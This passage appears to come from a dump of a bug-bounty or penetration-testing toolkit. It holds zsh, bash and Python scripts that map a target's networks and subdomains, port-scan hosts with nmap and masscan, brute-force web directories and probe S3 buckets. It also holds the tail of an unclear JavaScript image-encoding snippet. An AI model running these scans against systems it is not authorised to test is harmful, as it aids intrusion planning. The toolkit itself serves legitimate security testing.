nunc iaculis. Suspendisse tristique non ante ac lobortis.\\\n Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\\\n Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\\\n Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\\\n Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\\\n Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\\\n Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\\\n Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\\\n Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\\\n Vestibulum tincidunt diam vel diam semper posuere. Nulla facilisi. Curabitur a facilisis lorem, eu porta leo. Sed pharetra eros et malesuada mattis. Donec tincidunt elementum mauris quis commodo. Donec nec vulputate nulla. Nunc luctus orci lacinia nunc sodales, vitae cursus quam tempor. Cras ullamcorper ullamcorper urna vitae pulvinar. Curabitur ac pretium felis. Vivamus vel scelerisque nisi. Pellentesque lacinia consequat nibh, vitae rhoncus tellus faucibus eget. Ut pulvinar est non tellus tristique sodales. Aenean eget velit non turpis tristique pretium id eu dolor. Nulla sed eros quis urna facilisis scelerisque. Nam orci neque, finibus eget odio et, elementum finibus erat.*/\";\n img.src = encode(stringenc), b.innerHTML = \"\", b.appendChild(img)\n})();" }, { "path": "scripts/recon.zsh", "content": "#!/usr/bin/env zsh\n\n#continue on errors\nset +e \n\nautoload colors; colors\n\n__info() echo \"$fg[blue][*] $@ $reset_color\"\n__ok() echo \"$fg[green] [+] $@ $reset_color\"\n__warn() echo \"$fg[yellow][>] $@ $reset_color\"\n__err() echo \"$fg[red][!] $@ $reset_color\"\n\n############################################################# \n# Recon\n#############################################################\n\n[[ -z $1 ]] && __err \"Missing argument.\\nUsage: zsh $0 \" && exit\n[[ -z $2 ]] && __err \"Missing argument.\\nUsage: zsh $0 \" && exit\n[[ -z $3 ]] && __err \"Missing argument.\\nUsage: zsh $0 \" && exit\n\nexport DOMAIN=$1\nexport ORG=$2\nexport DIR=$3\nexport UA=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\"\n\nexport F_ASN=\"${DIR}/asn.txt\"\nexport F_CIDR=\"${DIR}/cidr.txt\"\nexport F_SUBS=\"${DIR}/subs.txt\"\nexport F_SUBS_RES=\"${DIR}/subs.resolved.txt\"\nexport F_HOSTS=\"${DIR}/hostnames.txt\"\nexport F_HOSTS_IP=\"${DIR}/hostips.txt\"\nexport F_WEB=\"${DIR}/urls.txt\"\n\nexport PORTS=\"21,22,25,80,443,135-139,445,3389,3306,1433,389,636,88,111,2049,1521,110,143,161,6379,5900,2222,4443,8000,8888,8080,9200\"\n\n############################################################# \n# Startup\n#############################################################\n\n__info \"Recon.zsh running... \"\n__info \"Domain: ${DOMAIN} Org: ${ORG}\"\n__info \"Using current directory for output: ${DIR}\"\n\n############################################################# \n# Steps\n#############################################################\n\norg() {\n\n __ok \"metagoofil'ing files\"\n mkdir -p ${DIR}/files\n metagoofil -u \"${UA}\" -d ${DOMAIN} -t pdf,doc,docx,ppt,pptx,xls,xlsx -w -l 100 -n 50 -o ${DIR}/files > /dev/null 2>&1 &\n}\n\nnetwork() {\n\n __ok \"Amass'ing ASNs\"\n amass intel -org \"${ORG}\" | cut -d, -f1 > ${F_ASN}\n\n __ok \"BGPview'ing CIDRs\"\n for asn in $(cat ${F_ASN})\n do \n if [[ ! -z ${asn} ]]\n then \n curl -s https://api.bgpview.io/asn/${asn}/prefixes | jq -r '.data | .ipv4_prefixes | .[].prefix' > ${F_CIDR}\n fi\n done\n\n __ok \"dnsrecon'ing PTRs\"\n network_dnsrecon\n\n #__ok \"masscan'ing CIDRs\"\n #network_masscan \n\n}\n\nnetwork_dnsrecon() {\n mkdir -p ${DIR}/ptr\n for cidr in $(cat ${F_CIDR})\n do \n if [[ ! -z ${cidr} ]]\n then\n local net=$(echo ${cidr} | cut -d/ -f1) \n dnsrecon -d ${DOMAIN} -r ${cidr} -n 1.1.1.1 -c ${DIR}/ptr/ptr.${net}.csv > /dev/null 2>&1\n fi\n done\n}\n\nnetwork_masscan() {\n mkdir -p ${DIR}/net\n for cidr in $(cat ${F_CIDR})\n do\n if [[ ! -z ${cidr} ]]\n then\n local net=$(echo ${cidr} | cut -d/ -f1) \n sudo masscan ${cidr} -p${PORTS} -oL ${DIR}/net/masscan.${net}.txt > /dev/null 2>&1\n fi\n done\n}\n\n\ndomains() {\n\n echo \"${DOMAIN}\" > ${DIR}/domains.txt\n\n __ok \"Subfinder'ing \"\n subfinder -d ${DOMAIN} -nW -silent >> ${F_SUBS} > /dev/null 2>&1\n\n __ok \"crt.sh'ing \"\n curl -s 'https://crt.sh/?q=%.$DOMAIN' | grep -i \"${DOMAIN}\" | cut -d '>' -f2 | cut -d '<' -f1 | grep -v \" \" | sort -u >> ${F_SUBS} > /dev/null 2>&1\n\n __ok \"waybackurls'ing... \"\n echo ${DOMAIN} | waybackurls | cut -d \"/\" -f3 | sort -u | grep -v \":80\" >> ${F_SUBS} > /dev/null 2>&1\n\n __ok \"sorting results \"\n cat ${F_SUBS} | sort -u -o ${F_SUBS} > /dev/null 2>&1\n\n}\n\nlookups() {\n\n __ok \"massdns'ing domains\"\n /opt/recon/massdns/bin/massdns -r /opt/recon/massdns/lists/resolvers.txt -t A -o S ${F_SUBS} -w ${F_SUBS_RES} > /dev/null 2>&1\n\n __ok \"extracting resolved hostnames\"\n sed 's/A.*//' ${F_SUBS_RES} | sed 's/CN.*//' | sed 's/\\..$//' | sort -u >> ${F_HOSTS} > /dev/null 2>&1\n\n __ok \"extracting resolved IP addresses\"\n grep -o '[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}' ${F_SUBS_RES} | sort -u | sort -V -o ${F_HOSTS_IP} > /dev/null 2>&1\n}\n\nscans() {\n\n __ok \"scanning host IP's\"\n mkdir -p ${DIR}/hosts\n\n for h in $(cat ${F_HOSTS_IP})\n do\n __ok \"...scanning ${h}\"\n\n mkdir -p ${DIR}/hosts/${h}\n\n nmap -sT -p ${PORTS} -T4 --open ${h} -oA ${DIR}/hosts/${h}/scan > /dev/null 2>&1\n done\n\n}\n\nweb() {\n\n __ok \"httprobing resolved hosts\"\n cat ${F_HOSTS} | httprobe -t 3000 -s -p https:443 | sed 's/....$//' >> ${F_WEB} > /dev/null 2>&1\n\n mkdir -p ${DIR}/web\n\n for url in $(cat ${F_WEB})\n do\n \n __ok \"...enumerating ${url} ... \"\n\n local host=$(echo ${url} | cut -d/ -f3)\n local hdir=${DIR}/web/${host}\n\n mkdir -p ${hdir}\n\n __ok \"Getting IP address\"\n host ${host} > ${hdir}/ip.txt > /dev/null 2>&1\n\n __ok \"Curling robots.txt\" \n curl -s -L ${url}/robots.txt -o ${hdir}/robots.txt > /dev/null 2>&1\n\n __ok \"Whatwebbing\"\n whatweb ${url} -a 1 > ${hdir}/whatweb.txt > /dev/null 2>&1\n \n __ok \"Wafw00fing\"\n wafw00f ${url} > ${hdir}/waf.txt > /dev/null 2>&1\n\n __ok \"Gobustering\"\n gobuster dir -q -z -u ${url} -w /usr/share/seclists/Discovery/Web-Content/common.txt -t10 -k -o ${hdir}/gobuster.txt > /dev/null 2>&1\n\n __ok \"S3 Bucketing\"\n aws s3 ls s3://${host} > s3.txt > /dev/null 2>&1\n\n done\n\n}\n\n############################################################# \n# Workflow\n#############################################################\n\n__info \"Searching for Org OSINT... \"\n\norg\n\n__info \"Mapping Network... \"\n\nnetwork\n\n__info \"Collecting sub-domains...\"\n\ndomains \n\n__info \"Resolving sub-domains... \"\n\nlookups\n\n__info \"Scanning IP addresses...\"\n\nscans\n\n__info \"Probing web servers...\"\n\nweb\n\n__info \"Checking job completion...\"\n\nwait $(jobs -p)\n\n__info \"Recon completed\"\n\necho \" \"\n" }, { "path": "scripts/webrecon.zsh", "content": "red=`tput setaf 1`\ngreen=`tput setaf 2`\nyellow=`tput setaf 3`\nreset=`tput sgr0`\n\necho -e \"[*] webrecon.zsh \"\necho -e \"[*] source: $1\"\necho -e \" \"\n\nfor url in $(cat $1);do \n echo -e \"[*] Enumerating ${url}\"\n\n ############################################################\n # Make directory\n ############################################################\n\n host=$(echo $url | cut -d \"/\" -f3)\n\n echo -e \"${green} [+] Making directory ${host} ${reset}\"\n mkdir -p ${host}\n\n ############################################################\n # Host\n ############################################################\n echo -e \"${green} [+] Getting IP address... ${reset}\"\n host ${host} | tee ${host}/ip.txt > /dev/null\n \n ############################################################\n # Robots\n ############################################################\n echo -e \"${green} [+] Curling... robots.txt ${reset}\" \n curl -s -L ${url}/robots.txt -o ${host}/robots.txt\n\n ############################################################\n # Ports\n ############################################################\n echo -e \"${green} [+] Nmapping... ${reset}\"\n nmap -sT --top-ports 100 --open ${host} -oA ${host}/ports > /dev/null \n\n ############################################################\n # Whatweb\n ############################################################\n echo -e \"${green} [+] Whatwebbing... ${reset}\"\n whatweb ${url} -a 1 > ${host}/whatweb.txt 2> /dev/null\n\n ############################################################\n # Wafw00f\n ############################################################\n echo -e \"${green} [+] Wafw00fing... ${reset}\"\n wafw00f ${url} > ${host}/waf.txt 2> /dev/null\n \n ############################################################\n # Gobuster\n ############################################################\n echo -e \"${green} [+] Gobustering... ${reset}\"\n gobuster dir -q -z -u ${url} -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -k -o ${host}/gobuster-dirs.txt 2> /dev/null\n \n ############################################################\n # Eyewitness\n ############################################################\n #echo -e \"${green} [+] Screenshotting... ${reset}\"\n #eyewitness --web --single ${url} -d ./${host}/screens --no-prompt &> /dev/null\n\n ############################################################\n # AWS\n ############################################################\n echo -e \"${green} [+] S3 Bucketing... ${reset}\"\n aws s3 ls s3://${host} > s3.txt 2> /dev/null\n\n echo -e \" \"\ndone\n\necho -e \" \"\necho -e \"[*] Done\"" }, { "path": "scripts/wildcards.py", "content": "#!/usr/bin/env python3\n# coding=utf-8\n\n# *******************************************************************\n# *** Wildcards ***\n# * Description:\n# A script that does recon on public bug bounty wildcard domains.\n# * Version:\n# v0.1\n# * Homepage:\n# https://github.com/stevemcilwain/wildcards\n# * Author:\n# Steve Mcilwain\n# *******************************************************************\n\n# Modules\n\nimport sys\nimport requests\nimport os\n\n# Configuration\nWILDCARDS_URL = \"https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/wildcards.txt\"\nWILDCARDS_FILE = \"wildcards.txt\"\n\n# Colors\n\ndef print_red(skk): print(\"\\033[91m{}\\033[00m\" .format(skk)) \ndef print_cyan(skk): print(\"\\033[96m{}\\033[00m\" .format(skk)) \ndef print_yellow(skk): print(\"\\033[93m{}\\033[00m\" .format(skk)) \n\n# Workflow\n\ndef download_file_from_url(url, file):\n result = False\n\n r = requests.get(url, allow_redirects=True)\n\n if r.status_code == 200:\n with open(file, \"wb\") as f:\n f.write(r.content)\n result = True\n else:\n result = False\n\n return (result, r.status_code)\n\ndef read_domains_from_file(file):\n result = False\n domains = set()\n\n with open(file, \"r\") as f:\n for line in f:\n if line.startswith(\"*.\"):\n domain=line[2:].rstrip(\"\\n\")\n domains.add(domain)\n result = True\n \n return (result, domains)\n\ndef main():\n\n print(\" \")\n print_cyan(\"Wildcards\")\n print(\" \")\n print_cyan(\"[INFO] Roundin 'em up!\")\n\n results = download_file_from_url(WILDCARDS_URL, WILDCARDS_FILE)\n if not results[0]: sys.exit(\"[ERR] Failed to download file: {}\".format(results[1]))\n\n print(\"[INFO] Wrangled into: {}\".format(WILDCARDS_FILE))\n\n results = read_domains_from_file(WILDCARDS_FILE)\n if not results[0]: sys.exit(\"[ERR] Failed to download file\")\n\n #for domain in domains:\n #print(\"Domain: \" + domain)\n\nif (__name__ == \"__main__\"):\n try:\n main()\n except KeyboardInterrupt:\n print('\\nKeyboardInterrupt Detected.')\n print('\\nExiting...')\n exit(0)" }, { "path": "scripts/wildcards.sh", "content": "#!/usr/bin/env bash\n\n#############################################################\n# wildcards.sh\n#\n# This script is intended to run on a VPS as a cron job.\n# Run it nightly and it will any newly discovered sub domains\n# from the list of root domains that use wildcard scope.\n#############################################################\n\n# Set an environment variable in your .bashrc for your Slack webhook\n# export __WILDCARDS_SLACK=\"https://hooks.slack.com/services/\"\n\n# Setup cron to run at a certain hour every night, example below at 2 am\n# crontab -e\n# m h dom mon dow command\n# 0 2 * * * /bin/bash /path/to/wildcards.sh \n\nDOMAIN=$1\nSLACK=$2\n\nif [[ -z \"$DOMAIN\" ]]\nthen\n echo \"[x] Missing domain\"\n exit 1\nfi\n\necho $(date) >> log.txt\necho \"$DOMAIN\" >> log.txt\necho \"$SLACK\" >> log.txt\n\ncurl -X POST --data-urlencode payload=\"{\\\"text\\\": \\\"Wildcards starting for $DOMAIN \\\"}\" $SLACK\n\namass enum -active -ip -d $DOMAIN\nDIFF=$(amass track -d $DOMAIN -last 2 | grep Found | awk '{print $2}')\n\necho \"Diff: $DIFF\" >> log.txt\n\nif [[ ! -z \"$DIFF\" ]]\nthen\n curl -X POST --data-urlencode payload=\"{\\\"text\\\": \\\"$DIFF\\\"}\" $SLACK\nfi\n\ncurl -X POST --data-urlencode payload=\"{\\\"text\\\": \\\"Wildcards completed for $DOMAIN \\\"}\" $SLACK" }, { "path": "system/hidpi.sh", "content": "#!/usr/bin/env bash\n\nxfconf-query -c xfwm4 -p /general/theme -s Kali-Dark-xHiDPI\nxfconf-query -c xsettings -p /Gdk/WindowScalingFactor -n -t 'int' -s 2\ncat <<- EOF >> ~/.xsessionrc\n\texport QT_SCALE_FACTOR=2\n\texport XCURSOR_SIZE=48\n\texport GDK_SCALE=2\nEOF" } ]